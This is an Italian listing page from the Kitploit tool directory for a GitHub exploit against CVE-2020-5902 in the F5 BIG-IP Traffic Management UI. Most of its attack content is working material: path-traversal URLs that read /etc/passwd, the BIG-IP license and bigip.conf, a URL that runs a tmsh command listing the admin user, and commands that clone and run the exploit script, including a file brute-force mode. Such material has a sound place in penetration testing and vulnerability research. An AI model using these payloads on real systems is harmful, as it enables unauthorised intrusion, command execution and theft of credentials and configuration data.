Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-5902 — codice exploit per F5-Big-IP (CVE-2020-5902) | Kitploit
Strumenti/GitHubGitHub/yasserjanah/cve-2020-5902
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingStrumento di Accesso Remoto
GitHubyasserjanah/cve-2020-5902

CVE-2020-5902

codice exploit per F5-Big-IP (CVE-2020-5902)

Vedi Repository
431583 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-5902

codice exploit per F5-Big-IP (CVE-2020-5902)

Riepilogo

Nelle versioni BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 e 11.6.1-11.6.5.1, l'interfaccia utente di Traffic Management (TMUI), nota anche come utility di Configurazione, presenta una vulnerabilità di Remote Code Execution (RCE) in pagine non divulgate.

Prova di concetto

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Utilizzo

$ git clone https://github.com/yasserjanah/CVE-2020-5902
$ cd CVE-2020-5902/
$ pip3 install -r ./requirements.txt
$ python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd

-b per eseguire una forzatura brute dei file da una wordlist

$ python3 exploit-CVE-2020-5902.py -ip <IP> -b
Scarica lo strumento